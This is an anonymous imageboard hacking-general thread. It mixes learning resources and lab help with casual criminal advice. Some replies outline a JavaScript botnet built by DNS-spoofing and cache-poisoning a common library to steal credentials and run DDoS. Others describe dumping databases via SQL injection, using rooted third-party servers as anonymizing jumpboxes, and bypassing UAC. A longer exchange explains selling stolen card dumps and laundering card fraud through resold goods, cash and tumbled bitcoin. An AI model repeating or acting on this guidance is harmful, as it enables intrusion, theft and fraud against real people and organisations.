[ [̲̅$̲̅(̲̅ιοο̲̅)̲̅$̲̅] / rules ] [ mega / sec / tech / λ / diy / layer ] [ zzz / feels / drg / lit / cult / civ ] [ q / random ] [ / / V ] [ volafile / LainTV ]

sec - Cybersecurity

"There will come a time when it isn't 'They're spying on me through my phone', anymore. Eventually, it will be, 'My phone is spying on me.'"
SelectFile / Oekaki
Select/drop/paste files here
Password (For file deletion.)
Expand all images
Mute all images


The mumble server is lainchan.org : default port

File: 1467601765379.jpg (64.43 KB, 704x445, 704:445, hacking.jpg) ImgOps Exif iqdb

 No.109[Last 50 Posts]

Anyone save the last one? Losing too much valuable info when these threads 404. They need to be archived or at least have a pastebin to reference so new threads can be created. Only one has been saved so far and it was from over a year ago!


Hijacking /g/'s hacking general since theirs seems to be more comprehensive:

How To Become a Hacker: http://catb.org/~esr/faqs/hacker-howto.html

Relevant Social Engineering thread:




Since this is a new thread, I'm more inclined to participate, since I'm already caught up.

I'm simply working on some moderately interesting projects and reading about computing, for the most part.

I mess around with my HP calculators often, so maybe I'll release a program here when I make something that could be useful to others.



File: 1467615349958.jpg (17.34 KB, 500x500, 1:1, 1441840448722.jpg) ImgOps Exif iqdb

What are some of the more useful tools in the Kali toolset that are worth learning?



Metasploit. Offensive Security offers a free course. (http://www.offensive-security.com/metasploit-unleashed)

I would also recommend Burp Suite if you want to break web apps.



>Frontend development
>Backend development
[Gist] backendDevelopmentBookmarks.md
>Useful tools
https://libraries.io/ - Discover new open source libraries, modules and frameworks and keep
track of ones you depend upon.
>NEET guide to web dev employment
>How I Got a Job in Web Development
>Random Shit
Godly resource of thousands of PDFs
Decent videos if you wanna get some certs



File: 1467652033397.jpeg (44.34 KB, 502x502, 1:1, 147338-1413265585259.jpeg) ImgOps iqdb


With the exception of reversing tools the rest you can just google fu or read man pages on when you need them.



Thanks - from last OP of hacker generals



another good resource is
Python learning with hacking!



What are you wanting to learn?
wifi hacking?
web application hacking?





I tried this one and I am glad I did, first thing I ran across something I could actually make progress in, right now step 3 I guess, need to install some new software before proceeding. Seems very fun but not much information is there O.o still a lot a mistery, anyone knows more about this challenge?



File: 1467709427441.png (115.97 KB, 448x593, 448:593, NITROstudentV1.png) ImgOps iqdb

U.S. Secret Service Network Intrusion Responder Program (NITRO) Course:



Anyone know is the OSCP course matierial is pirated somewhere? I can't find anything.



the course material is watermarked with your personal information, and they'll revoke your OSCP if they find your pirated shit.

>you have to scan your drivers license or passport and send them the scan to register

>can't register with a free email address

Currently taking the PWK/OSCP course, if you have any specific questions , reply to me or get at me on irc #lainchan (I'm udnid, it's not a randomly generated name)

To avoid the question from anyone, I will not give you a copy of any course materials. There's no s00p3r s3kr3t adv4nc3d hacking techniques.

Just go to vulnhub, do their shit, don't use metasploit when you're learning.
Enumerate the shit out of everything.




Basically what >>125 said.
The course book alone is so watermarked you'll never, EVER see anyone post it anywhere. You'll never be l33t until you drop dough on the learning material. You're stupid for even asking. Ain't nobody gonna give you that shit. It's so secret, you have to submit DNA (semen and/or blood) to Offensive Security. You'll never get. Never! Never ever!


Oh, oooooooh!

In all seriousness, most of the benefit of PWK comes from the lab environment and other supplementary materials like videos. The .pdf does have some solid info, though. Absorb some info, set up some labs, and learn.



Thanks lainon, we could try to make a download home lab version that you can through in your own vm software.



No problem, enjoy.

If you're looking to put together your own virtual lab, a simple Kali and Metasploitable setup running on your VM software of choice should work. With the Kali machine, you can work on your Linux and scripting skills. The Metasploitable machine gives you an ez-pz target to recon and attack from your Kali machine. Between the two machines, you should be able to work through most of the concepts, tools, and skills in the PWK .pdf (although you'll still be missing out on some things).



Seems like someone deleted my post (US GOVT at work), lainchan hacking group when?



What could be gained from working together as opposed to operating individually or as a loose collective?



File: 1468188784035.epub (11 MB, Practical Malware Analysi….epub)

I really enjoyed this book. It was also the first time i've been involved in using the Win32 API, despite being a coder for 10+ years.
Do you guys have more book recommendations regarding malware targeting Windows?



Separation of concerns.
A loosely knit collective would be a reasonable compromise. Is anyone here familiar with Goatse Security? (Goatsec)



The collection of skillsets. One might be interested in authentication systems, cryptography and algorithms, while the other might love logical errors in code. See what I mean?



Alright anons can you help me out with this one without actually giving me the answer?

I guess solution will involve spoofing the User-Agent field in the request header with Postman but don't know where to go from there.




That's literally it bruh.



But what do i put in there? I don't have the browser name. I feel like a fucking idiot



Set the User-Agent to 'SDSLabs'. It just checks that 'SDSLabs' is in the User-Agent string.



File: 1468277286639-0.jpg (36.44 KB, 606x540, 101:90, 1431232240868.jpg) ImgOps Exif iqdb

File: 1468277286639-1.jpg (49.06 KB, 500x333, 500:333, 1431734305026.jpg) ImgOps Exif iqdb

>>109 (OP)
Hey guize, I know this is probably going to make me sound like a potato, but I've been trying to work with the liveCDs from PentesterLabs and none of the ones I've tried boot to any graphical interface and I can't find any of the actual content from cd'ing around.

I'm sure its just a simple fix, but any help would be appreciated.

For reference I'm using and Ubuntu 32 Virtual Box machine and I'm trying to start Web for Pentesters.



first make sure your using a hypervisor ie vmware, virtualbox, etc. it's also not supposed to have a desktop.

run the ifconfig command on the live iso, (make sure you set the network card on the vm)
you should get a ip, now you should ping that machine from your attacking machine, if you get replies that good!

now in your browser type "http://<ip address>/
how your on the victim machines website!
good luck!
msg me if you need anymore help!




Are there any major differences between your current pdf and the one posted >>126

How are you finding the course so far? What's your study schedule like and how much lab time did you get?
I'm interested in taking the course but that price tag is pretty daunting, do you think you'll find easy employment once you grab the cert? Do you have a degree as well?



>do you think you'll find easy employment once you grab the cert? Do you have a degree as well?
maybe a entry level tech job, but honestly pentesters in general are overly saturated part of the security field, plus very few people would trusted a "just got my cert".

That being said, most likely you will have to move up the ranks, or join the military and get training that way. ( i wouldn't recommend though)



I have a couple years experience as a student linux sys admin. I'll finish my degree in Comp Sci next summer. I've been thinking about trying to get the OSCP before I graduate, hoping that it would help me land a security job out of college rather than having to make the sys admin to security pivot. What's been stopping me is the price and maybe moreso the time commitment, my last few semesters are going to be packed and I'll be working part time on top of it. I'm having real analysis paralysis picking between sys admin, security, or software dev.



>>109 (OP)
I think these should be in the general:


Phineas Fisher's write up of how they hacked Hacking Team.

Also OPSEC, everyone needs it!




fuck are all those ebooks from the old thread gone now? I checked the archive and got a 404. Fuck I took for granted that I could always come back here and get those books.



So I've been programming for a few years. I've done about a dozen of the microcorruption levels, read about half of the shellcoder's handbook, know basics of assembly and C, used to crack WEP with aircrack etc.

I feel like most people's interest in hacking wanes as they grow up and become better programmers and just want to make rails apps and live like a richfag in sanfran. I'm not really one of those people. What kind of mischief could I actually get into if I were so inclined? I don't really see myself creating my own exploits but what's like the next level above script kiddy? Years ago I read about someone operating a botnet and mining bitcoin with them. I know those days are long gone but running a botnet still sounds fun.




mmm the next level is probably still script kid but more like well educated script power user.

Example: using mitmf+dnslib+privoxy+apache mod_expire to create your own JS botnet by cache poisoning people at a coffeeshop or placing an open proxy on the net and letting all the other skiddies get infected.

JS payloads are might effective. Assume you've scripted your JS payload to pull actions from a C&C server and assume that you're proxy is up for a good week and you've seen 5,200 people. Managing to dnsspoof code.jquery.com, 3,200 of those users are now running the modified version of the code b/c mod_expire tells their cache to keep jquery.js for 3 years.

All your clients pull the payload and run it... what can you do?

1. Steal credentials
2. Replace ads with your own and profit
3. embed youtube vids over adspace and sell views (this is a thing)
4. DDoS by consistently targeting a latent part of a webapp, such as consistently downloading a large file or a really complicated search query that has multiple table joins and poor use of globbing.
5. Attempt to use a precanned exploit and have a percentage of those users lend their computers compeltely to you.

so on and so forth. I think that would be a masterful approach of someone who's not the /best/ "hacker" but shows great intelligence and ingenuity in the way that you can combine pre-existing tools into your own unique attack vector.



How should I go about finding a box on Shodan that I can get root on? I just need root on a remote server.



Thanks man a lot, I was under the impression it would just be self-contained all in the VM, but I guess not.

So now I'm trying to set up port forwarding so I can access it because the ping isn't working.

I'm using Virtual Box and in the network settings for this particular vm have set: Protocol to TCP
Host ip to vm's ip from ifconfig)
Host port to port 80
Guest ip to my own external ip from a "what's my ip" site
Guest port to port 80

for the guest IP i also tried my own local network ip but with these settings doesnt return pings




To clarify, using my "whats my ip" addr doesn't work and the internal ip doesn't work.

The way I wrote it sounded ambiguous.



is your attacking machine on the same network as your victim?

you shouldn't need to set port forwarding.



>>150 is for >>148

i wouldn't recommend doing that is somethings skids do, and legal reasons, however i wouldn't recommend shodan because thats for I.O.T. people who search for vuln sites would be normally usings googledorks instead.
like a vuln software in quotes of something not configured.



>>109 (OP)
Thanks for reviving.

Try creating a host-only network from File->Preferences->Network and putting both the attacker and target machines on it. Enable DHCP as well.

Worked for me at least. I'm following a walk-through from VulnHub, the one they say to start with.





Hey, thanks for sticking around, i figured it out.

I was trying to work out a NAT network but in the end I just set it up for host only adapter and everything worked out.



There's been one for years, what do you bring to the table?



Has anyone ever attempted to mess with those digital business signs you see along the road? Not billboards, but signs for specific businesses.

There's one I see along my commute every day that seems like it might be something I could get into. It's too far from the business to be controlled from there, so I'm thinking there's a computer or something sitting in the access box on the side.



Anyone would like to team up and try to play some CTF maybe? We could arrange something onto some random IRC channel.

Also see this: http://wechall.net
for more wargames' sites.



the free version of burp suite is worth using? see that some cool features is only available in the paid version



Honestly, i never pay for tools in general, however paying for burb is only useful if you plan on doing automated scans on huge networks and even then not really.

for every paid feature they're free tools too! That being said burb is the goto tool for manual web app testing!



im not advocating, but if you bought a hardhat, tool belt, and a dirty white shirt no one would think twice, plus most of those machines have the instructions or a number you can call for help on the inside.



Two CTFs starting this weekend.
Palo Alto's having one, more info at http://labyrenth.com/

The second one's a ez-pz(?) high school level one. Info's at http://abctf.xyz/

Keeping track of these is helped by https://ctftime.org/



>>109 (OP)

Overthewire bandits challenge doesnt seem to work. I tried to ssh to the given url but was to only be presented with a password. When I ssh'd it just should had asked for a usrname and password right?




Try to SSH into bandit0@bandit.labs.overthewire.org



Oh, and if it wasn't clear use bandit0 as the password when prompted for one. The bandit0 part of bandit0@bandit.labs.overthewire.org specifies your username you want to log in to. So, as you progress to level one you can log out of bandit0 and then SSH into bandit1@bandit.labs.overthewire.org with the password gained by poking around as bandit0.



Yeah I logged in perfectly fine now. Thank you



anyone having problems at bandit6?
im an idiot



Use the find command. Look at the man page and check out the -size option.



So no one saved the last thread?



well, it's an imageboard. threads dont get saved..



Some other imageboards have automatic permanent and/or temporary archives, so I don't see your point. Seeing as this is a topic general, it makes sense that it would at least get saved somewhere for future reference.



This imageboard runs on PowerBook 180 and has 80MB of hard drive space.



Hmmm I've seen wget and powershell recommended elsewhere for archiving websites. If you're familiar with them, what you would you recommend for personally automating thread archival? I've never had to use either before so which ever one is most straightforward is preferred.



>it's an imageboard. threads dont get saved
That kind of logic is completely flawed.
A lot of different imageboards have resource filled threads that are "generals" and cyclical, continuing on theme/topic of last thread, so if you start to read the middle of conversation you will be really dazzled and confused.
That's why a lot of people just save them with 3rd party sites like archive.is or even just CTRL + S
If you are however trying to insinuate that imageboards don't have capabilities and functions of saving threads, I would agree with you but for completely different reasons (I assume). But that wasn't the question >>167
asked. He simply asked if someone saved it.
I think that was "high quality post" what you guys would say, no?



I think it partially has to do with the tinfoil mentality that the cyberpunk scene can foster. They don't want the threads saved because then gubberment will find their sekrit haxxor techniques.



>then gubberment will find their sekrit haxxor techniques
I understand that you tried mocking here, but still the line of logic makes no sense.
People that are into haxxor world understand that gubberment has enough resources, time and goal to either invest in or to just buy out their own breed of super duper haxxors. In reality people that have brains already acknowledge that other people have brains too, there is no need for these pseudo-secrets that anyone can google for, and if you are trying to insinuate that cyerpunk scene doesn't have that good enough of self-awareness then I don't understand what your thought process is to be honest.
The bottom of the barrel of cyberpunk scene, yea even lainchan, can acknowledge that gubberment surveillance is pervasive and persistent and it won't go away until the whole system comes crashing down.
So, "tinfoil mentality" won't be directed at saving threads to help the little guy trying to have fun on his computer, but rather will be directed at cautionary way cybers act towards the gubberment.



I posted that because I have seen some lainons claim that it defeats the purpose of a chan, especially one of this nature. The cyberpunk scene does have good self awareness but it is still prone to tinfoiling with the topics at hand. I mean /g/ is just a regular tech community and it tinfoils often, justifiably or not.



>I have seen some lainons claim that it defeats the purpose of a chan, especially one of this nature
Well, you're moving the goalpost, but I would love to see where these lainons are, especially when I explained above how these resource filled informational threads are in dire need for people that want to re-read or people that are new to conversation and want to be up-to-date with topic at hand and with all info that was posted.

>still prone to tinfoiling with the topics at hand

I have no problem with tinfoiling, it's kind of natural that with more exchange of information (and wider accessibility of internet) we have come to point where we now know some of shady dirty things that governments and politicians do for their own or interests of their groups.
Just look at Shillary mail scandal, I guess nobody really looked at it but most people are making a fuss about it. Why? Because she talked about how Syria needs to be taken down for Israel interests (this was back in early 2000s). Obviously a lot more players were involved in Syria, not just AIPAC and Shillary, but that alone makes you little bit paranoid and cautious about what other shit might be going on so the general rule of thumb is the kind of "everything that can go wrong, will go" of paranoia. So most people just try to keep 1 upping themselves over privacy and hacking paranoia which in my opinion I have no problem with, its in best interest of everyone to be up to date and best, so whats the downfall? Few shizos running around connecting dots? Big whoop

I found it on archive.is



How is that moving the goalpost? My observation was the basis for the post, not a diversion. Like I said it is not the only reason. it is probably a reason among several for the lack of an archive. I would show you where lainons said this when the issue of archiving was brought up, but I can't because the threads have disappeared due to the lack of an archive.

>inb4 unfalsifiable

Many would agree with you about the preservation of resource rich threads, and I certainly do, but that doesn't mean it is the consensus. Even if I don't wholy agree, there certainly is some merit to the argument of maintaining overall plausible deniability and having the onus on the individual to save the threads for themselves. Skepticism (which is different from tinfoiling) of the government is certainly healthy and rational as you have pointed out. Still with semi-hivemind chan culture the way it is, it can become counterproductive irrational paranoia.

And that archive link you posted is in the OP. It is also not the previous thread, but the one before it. The previous thread was not saved, apparently.



if it's about needing resources, lets make a wiki



We just need a pastebin for the generals, and someone in charge of uploading dying thread generals to archive.is so they don't get lost forever. There are already enough resource wikis and aggregated cyberpunk sites out there.



Be the change you want to see in the Wired.



>My observation was the basis for the post, not a diversion
My wrong, it just seemed like you were trying to change the topic.

>>inb4 unfalsifiable

I trust you.

>maintaining overall plausible deniability

We are, on what I would like to believe, is anonymous imageboard with only one who is in capability to see our real identity being the chan owner and his friends with access to the server.
With that being said, plausible deniability is already ingrained in the anonymous nature of imageboard, assuming that the letter soup agencies won't ask kalyx for any info. But even then, I assume most people here browse with Tor or some VPN.

>on the individual to save the threads for themselves

As I said, what if someone comes in the thread in middle of conversation? Can't he get info about past conversations?

>Still with semi-hivemind chan culture the way it is, it can become counterproductive irrational paranoia.

I guess we have different ideas of what "paranoia" is. You associate it (I assume) with circlejerking and shitposting around the scary idea and I associate it with that few anons that never say anything and that always are in the shadows, only coming out to talk about their paranoid thoughts and to overall build on that paranoid thought, whether that be through software or doxxing of officials and making connections.

>It is also not the previous thread, but the one before it. The previous thread was not saved, apparently

Welp, darn.

>let's make a wiki
We can do it through Wikia. I already have chosen the "Lainchan Hacking General" name. What do you think?

Wiki is kinda better, pastebins are clunky and unreadable in my opinion and wiki has better look overall in my opinion



You are correct on the anonymous posting and identity part. I meant more along the lines though of in the event the law enforcement or whoever swooped in only seeing a mostly innocent sci-fi fantasy discussion site rather than a subversive one due to lack of an archive. Keeping these threads uploaded to a public archive gives them too much of a track record to build a case, and helps them put more pressure on Kalyx and his friends who have low capacity and resources to resist. This helps keeps the site alive, and that's more what I meant by overall plausible deniability.

The circlejerking and shitposting where they blow everything way out of proportion and essentially fearmonger is what I associate tinfoiling with mostly. Like caricatures of Richard Stallman. I associate the latter of you referred to more with legitimate hacktivists though that scene can attract a few anarchists and nihilists which makes them seem tinfoil at times.

If we make a wiki we should go all out and make it a resource hub, not just for hacking. Have a programming section, hacking and social engineering section, etc. We can build off of other wikis.



if (line[0] == 1 && !strncasecmp (line + 1, "ACTION", 6))
po = strchr (line + 8, '\001');
if (po)
po[0] = 0;
inbound_action (sess, dcc->serv->nick, dcc->nick, "", line + 8, FALSE, FALSE);
} else
inbound_privmsg (dcc->serv, dcc->nick, "", line, FALSE);
Find the flaw



>meant more along the lines though of in the event the law enforcement or whoever swooped in only seeing a mostly innocent sci-fi fantasy discussion site rather than a subversive one due to lack of an archive. Keeping these threads uploaded to a public archive gives them too much of a track record to build a case, and helps them put more pressure on Kalyx and his friends who have low capacity and resources to resist.

They would find who owns the physical server and just use digital forensics on it to recover everything deleted or overwritten. That being said, not having a archive would be a layer of security against OSINT

>The circlejerking and shitposting where they blow everything way out of proportion and essentially fearmonger is what I associate tinfoiling with mostly.

This is a big thing people get so paranoid they become unproductive, and do more harm than good. it's good to be paranoid bad to think zebra and not horse.

that being said it shouldn't matter because you wouldn't be posting your illegal actions on a PUBLIC web forum.

FBI and Europol didn't get lulzsec because a vuln in tor or x software, they got logs and used their conversations to identify where they lived.

not that you would do anything like that lainon



How can I go about "injecting" (I don't know if this is correct term) a Win32 program I've created into an admin process?

I need to get admin privileges/get around the UAC. I'm new to both systems programming and Win32 so I don't really know what terms to search for. The goal though is to not have to prompt for UAC.



what you're looking for I think is "escalation of priviledge ".
I don't know much about the subject but you should get a lot by looking thought the info posted ITT or through search engine



Haha somebody should hack their server to retrieve the last thread then. Jokes aside, is their anyway of maintaining plausible deniability with a server on the clearnet besides aliases and such? Is the only alternative ptp networking?

From what I read they were able to take down lulzsec because they targeted a key leader who had a lot to lose in his personal life if he didn't cooperate. So if you want to be a real hacker you should be detached and distant with the other hackers in your group.



Depends on your attempted point of ingress

Look up Thread Local Storage injection that can allow you to inject and spawn a thread under another running process.






If it's just UAC you need to bypass then check out UACME:


Otherwise, you'll need an privesc exploit. These aren't impossible to find but finding one in vanilla windows may take a fair bit of time. Your best bet is to exploit system specific misconfigurations or other shifty software running on the target system.



What kind of jumpboxes do you peeps recommend? Ofc you could buy with bitcoin, but the anonymity of it could vary, depending on how you buy and use the bitcoins themselves. Is it a good idea to use already hacked boxes as jumpboxes?



File: 1469585390685.jpg (6.09 KB, 223x226, 223:226, 1469072600217.jpg) ImgOps Exif iqdb

Suppose there was a website with multiple sql injection points.
How would I go about dumping the database?

The only approach I came across is to add an and expression and use a conditional operator to extract the data char by char.
I imagine this to be very slow, there ought to be something faster.




Yeah use OUTFILE to dump to a file on the server's static rsource directory. Since most 'webapps' use routing for url handling but define a static directory for images, css, and other non dynamic elements. Then pick it up by navigating to that file, domain.xyz/static/dump.sql



make sure you're in incognito mode or the feds will bust you



i really hope your joking...



Can anyone help me out with this?
i'm working on a web, can inject some sql and upload php files but exec and system functions are disabled.
Have any ideas to scale on the server?



File: 1469705707203.jpg (47.31 KB, 337x450, 337:450, 1329418108468.jpg) ImgOps Exif iqdb

I need your input, /cyb/. I'm sorry if i make some grammar mistakes, english isn't my native language.
I've been programming for about 5 years, i started at college and after 4 years i noticed how bad the education they offered was and how much they charged, so i left college. I've worked for a year as a Java developer but i quit. I did not enjoy working with front end, i am not good at it and i do not wish to work with that again. I have programming knowledge but nowhere near as much as i should have for someone who has been programming for so long. A few months ago i started studying math, back end and c++. I've learned a lot superficially, enough to know where i wish to specialize. I want to study encryption, security, hacking, reverse engineering and performance(query speed, execution speed etc), also i want to work remotely, since my experience in private and public corporations have not been good for me psychologically.
From this thread and previous knowledge i created a study routine, but i need the insight from more experienced people to know if this is a good plan to follow and if it's realistic to make money from this knowledge.

My current plan is:
Mathematics ( i'm following 8ch's /prog/ sticky, currently in Serje Lang's basic mathematics );
Cybrary (A+, Linux, Networking, Security, Penetration testing, computer hacking forensics, Python for security professionals, advance hacking, cryptography);
Offensive security classes (https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html)
Freecodecamp (freecodecamp.com)
Read Hacking: The Art of Exploitation;
Read https://trailofbits.github.io/ctf/index.html
Do http://www.primalsecurity.net/tutorials/python-tutorials/

Freecodecamp is mostly to have a way to make money in case everything goes wrong and i have nothing to eat. I don't expect to get much knowledge out of it, but they have lots of trendy technologies which would be useful to get a quick job, it's a failsafe. Keep in mind my goal isn't to gain illegal money, i just want to learn stuff that i enjoy and if i'm lucky make a living out of it from remote working and/or freelancing. Otherwise i will use it as a hobbie and work at a mall or something, either way i wish to learn the stuff. Don't worry about logistics or discipline, i will split these into 2 hours chunks of study. I already have been doing that for a few weeks, i just didn't have any focused course. I'm aware this is very long term and that's exactly why i need someone elses experience before i put in tons of time on something that might not be any good.

Do you think this material is any good, would you change/add something to it? Do you think it's realistic to get a (remote) job from this sort knowledge or make consistent money out of it, at least enough to pay for bills/food? I don't really wish to make an "official" career since i oftenly don't feel comfortable in these enviroments.



In op's archive page, there's a link for another, older archive.




Yeah that was the first hacking thread. The OP archive was the second. The third wasn't saved and we are now on the 4th



Are there any public wargames/pen testing simulations similar to the OSCP labs/exam?



I just found these classes, they're from Owen Redwood, the guy from offensive computer security.


They seem to be MUCH more web oriented than just a recorded college class, also it's more fresh than the one from 2014.



That requires FILE privileges (which are rarely granted) and a writeable directory (writeable to mysql, not http). If you manage to get OUTFILE working, you should just drop a shell.



Hey, i won't bump the thread since i've been posting a lot lately, but i found a pretty nice beginner's C tutorial if anyone is interested. It's exercise oriented.




I've done about half of this tutorial, it's pretty good but some people really hate Zed Shaw.



I hate his personality, he's a really annoying cunt who's probably impossible to work with. I don't think that really affects his work though, except that sometimes he's a bit prepotent even in his writing, but other than that...Can't really say anything about his technical knowledge.



You can find a torrent of the course booklet but it's a couple years out of date. (The one I have is for BackTrack.)

Much of it is still relevant though.
At the very least it's a good start point for those of us interested in the course but too damn broke to just buy it without first getting our footing first.

You can find it with a simple search on your favorite tracker.



Bump on this question.
Tor is a nice network but it's too slow and doesn't do UDP, so my preferred method would be using jumpboxes.

Me -> TOR -> Jumpbox -> Target

The important thing is that the jumpbox cannot be used to identify me.



NSA owns a lot of Tor exit nodes and NSA has connections to most of international secret agencies that have local power to ask ISPs to do their bidding.
So, time correlation attacks where packet times are looked at coming in Tor network (by ISP) and coming out of Tor exit node (by NSA) could link your identity to jumpbox.
Although, this wouldnt be done on some small fishy.

I would suggest either buying a VPN or rooting some old box that you would use between your PC and Tor network just so that your ISP doesnt see that you communicate with Tor.



sorry for the late reply,

I wouldn't see why you would need the mathematics?

Also before you start redwoods open course make sure you have a asm foundation i thought i could wing it on the way there and i learned the hardway that i couldn't.



Yeah, i'm doing C and asm before starting with redwood. He's very helpful at reddit, it shouldn't take more than a week before i'm able to keep up with the videos. He's posting an updated series right now.

The mathematics is more of a hobbie than anything really. I'm not yet sure where i can enjoy what i do AND work at home, maybe i'll go into statistics or something, i wanna have that option, but more than anything i just like mathematics.



File: 1469920682125.jpg (1.46 MB, 1920x1080, 16:9, 0004.jpg) ImgOps Exif iqdb

Where can I read more about so-called "black hat" monetization techniques?

None of that "spamming malware to grannies" Indian-scammer tier bullshit. I mean the real "1337 h4x0rz".
How do the real serious crackers make their cash?

(Disclaimer, I'm not interested in committing any crimes myself just curious about the actual details of how the criminals work)



I think studying OSCP and related fields is the most effective way. You'll have to learn that stuff to defend against it.

I'm in no way qualified to answer, it's just an educated guess.




Well you're not going to be hand held in any useful capacity because it's simply the way it is. A certain gimmick, process, technique, script (SE), or anything in between that is successful in making cash will by its nature be hoarded.

The lucrative side of things comes with networking with people. For example, I know person A. A has a few XSS exploits that are persistent and affect a very high profile web site. I look and find person B. I middle man A & B so that A isn't revealed. I collect commission.

You can be A or B, or C in this situation. But most likely you'll start out as B.

Other places where money is made by "crackers" (you really need to narrowly define this) is in selling their fruits. Such as a botnet. Or sell services as a result of that botnet, such as DDoS, or breaking hashes.

CC's are often sold in dumps and can fetch a nice price (again networking will save you here). So on and so forth.



I hate to be negative but today that's one of the biggest ways to make money,

it tends to fall under three categories
some form of credit fraud - (stealing and selling NPPI)
or exploit dev / malware dev



>CC's are often sold in dumps and can fetch a nice price
Here's something I don't understand about this.

Why would a person who has a stolen CC sell it off for practically nothing?
e.g. Selling an individual card for $5 - $30, when it can potentially be used to purchase many times that amount?

Why don't these "carders" simply use the stolen cards themselves and multiply their profits?

(Forgive me if this a naive question, I'm not exactly a black hat nor do I want to be. Just looking to get a better understanding.)




That's easy. Risk mitigation. Even with a fully cloned card you open yourself up to a tremendous amount of risk by having to appear in person with the card and possibly an ID to go with that card. You might be thinking right now, "Oh why don't they just shop online?" Track dumps aren't that helpful since most major credit card processors on the SWIFT network (banking network) now use associated data to verify the purchase.

Verified by Visa is a big one. You have essentially go through what is a secondary authorization to activate it. Which also means having to have the address that the card is associated with.

Even with a dropshipped item there's also the risk of having someone in LE catch on and wait for you at the dropship location.

So it comes down to risk. It's often easier to sell batches of these with almost no risk, behind tor and 7 proxies (so to speak) and transact solely through bitcoin.

The recipients will be putting themselves in danger every time they use the card.

The only exception to any of this that I can really see is purchasing digital goods. Such as VPN subscriptions, or VPS'es. The legitimate problem with cash like this is the amount you eventually lose after attempting to, and possibly succeeding, in laundering the cash into a liquid currency.



I see, that makes a lot of sense.

But why not just use the stolen cards to buy the BitCoin itself?
Surely there are some less-than-reputable dealers out there who would sell it with no questions asked?

Couldn't someone set up a "farm" so to speak of bots that used stolen cards from dumps to purchase large amounts of bitcoin?




Because bitcoin always keeps record of all the transactions. Anyone can follow where the cash flows from. The moment a wallet receives the illegal funds, anyone can watch who received it and how they spend it.

The best anonymizing step is to take the CC's convert it to liquid and untraceable goods/currency then taking the anonymizing step of disconnecting the CC from the bitcoin wallet which still involved the steps I mentioned above.

Now people do buy bitcoin with stolen CC's but they know that their wallets are known to have dirty money. And so do other people. And it might not matter after about 30 transactions have passed, the money then can really be pointed to be anyone in particular. Just which wallets had touched other 'dirty' wallets.

If I were the CC dude I would do this. Get a CC and purchase a few items off of Amazon tha tmight have high resale value. Such as an opened box of video cards, or SSD's or anything in general. Send it to a confederate (we mafia now) a state away and have him sell them on craigslist as part of a complete build.

The confederate then pays him in cash either before after or whenever (so long as I would receive this hypothetical cash). then use cash for bitcoins. Send some bitcoins to one wallet, send some to another.

Then rinse and repeat.



>Because bitcoin always keeps record of all the transactions. Anyone can follow where the cash flows from. The moment a wallet receives the illegal funds, anyone can watch who received it and how they spend it.

Why do criminals use it? Why don't get they busted I mean if it's ultimately traceable back to them? How do they 'clean' it?



I don't agree with this. It's easy to 'clean' bitcoins by tumbling them through darknet services and/or converting them into another cryptocurrency through an anonymous exchange. Otherwise >>220 would have a too valid point and it wouldnt be so useful for buying drugs and for ransomware.
>But why not just use the stolen cards to buy the Bitcoin itself?
Essentially everyone that's selling bitcoins is aware of scammers and so they take ID; because if they do the trade with dirty money, you run away with the bitcoins and the banks can take their funds. The sellers who don't, charge a much higher price for the bitcoins -- check out localbitcoins, it can even be like 20% premium or something -- and they'll probably tell you to get screwed if you say you can't do a cash transfer but just have some dodgy card. It's possible but it takes effort because you need to set up fake IDs, accounts, and to seek out naive sellers. In the end it can be easier and safer to sell off stolen cards, especially if they have a lot of them



Here's a list of tutorials just posted on cybrary's forums. Seems pretty good, haven't checked yet though.




The point is that the jumpbox can be identified. With a jumpbox I can actually do DNS enumeration with zone/wildcard attacks, UDP scanning and dumping fast. What I need to make sure that the jumpbox cannot be connected to me.



Find a vuln sever, get a shell, use that.



unfortunately no. As ' complicated as you try to make it, every swap is recorded. And swap groupings can beand are a huge point of correlation. every swap is recorded. And swap groupings can beand are a huge point of correlation. Not to mentionke it, every swap irecorded. And swap groupings can beand are a huge correlation point . Not to mention a lof of bit- coin laundaries are outright scams. When I have a chance to get on a computer; I'll source examples of how/ why btc gives everyone the chance for Omniscience over the chain.



Any VPN (that upholds your privacy, I suggest cryptostorm) or rooted box shall cut the job



Can someone recommend a book or learning source on linux server administration?

I have a small website I want to host on an old computer but know little about good practices and general proper security.



Take a look at cybrary and read the rest of the thread. There are collections of resources that mention linux administration.



Book is The Linux and Unix Sysem Administration Handbook. I don't know about the security portion in particular though.



Can't go wrong with O'Reilly Linux system administration



File: 1470077714109.gif (1.78 MB, 300x189, 100:63, sAvGJPB.gif) ImgOps iqdb

Found more neat stuff: http://opensecuritytraining.info/Training.html

God, i haven't been this excited about studying and even living in a very long time.



I want to become a cyberpunk. I always thought hackers and demosceners and crackers and stuff were cool as shit as a kid. Then there was shit like GNAA and weev and TOR, trolls and what not like Team Gamerfood.

It always seemed beyond my scope but things have changed lately. Pirating isn't as simple as media fire and megaupload anymore. Every website you sign up on, my android phone, anything google, every time I download an app it wants all my details, sites want phonecall verifications and shit. Lately I've been looking at shit and as soon as I went to google it, many of the top results were shit that was actually RELEVANT to what I was looking at. I fucking clicked a picture of some guy holding a tomoko kuroki dakimakura, I thought it was cool so I saved it and went to google one for purchase. I typed in "Tomok" and immediately "Tomoko kuroki bodypillow" popped up for the autofill.

Shit like this has been happening a lot lately, I need to get out of the matrix.



*for got to add that I clicked the picture on 4chan, not google chrome.

I've been using it a long time now because I like the interface, I'm even using it right now typing from my phone. I used to be worried a lot about cyber dystopia back in like 2011 but I got complacent and now with TPP and shit its actually happening.

I need to start learning shit



You can find everything you need in this thread. Just look around. Try to improve your (english) writing, it will make it easier for you to interact with other communities. Good luck.



Alright, I'll look around. I don't even really know what a hacker is, I always thought they were just college-educated programmers who liked to fuck around a lot. I don't know a thing about programming, but in my youth I loved trolling and visiting unsavory places like ED, textfiles/totse/zoklet etc and 4chan.

Is there a particular music that hackers listen to? I always thought they listened to this kind of stuff.



"Hackers" are just people. They listen to whatever they enjoy, each one will enjoy a different thing.



File: 1470091522249.jpg (90.29 KB, 575x833, 575:833, chen.jpg) ImgOps Exif iqdb

>Then there was shit like GNAA and weev and TOR, trolls and what not like Team Gamerfood.



I could have sworn that all hackers wore tiny sunglasses and trenchcoats and listened to https://www.youtube.com/watch?v=wsCGdhJ_SNo

What am I gonna do now? I already got a cool handle (Jinzo) and everything.

nao i do da hax?



>literal nazi
>pirating isn't as simple as megaupload any more
>google knows I'm a weeb

the hacking threads really bring out the kids.

look newlain, not necessarily in this order, but:

>delete all your hentai

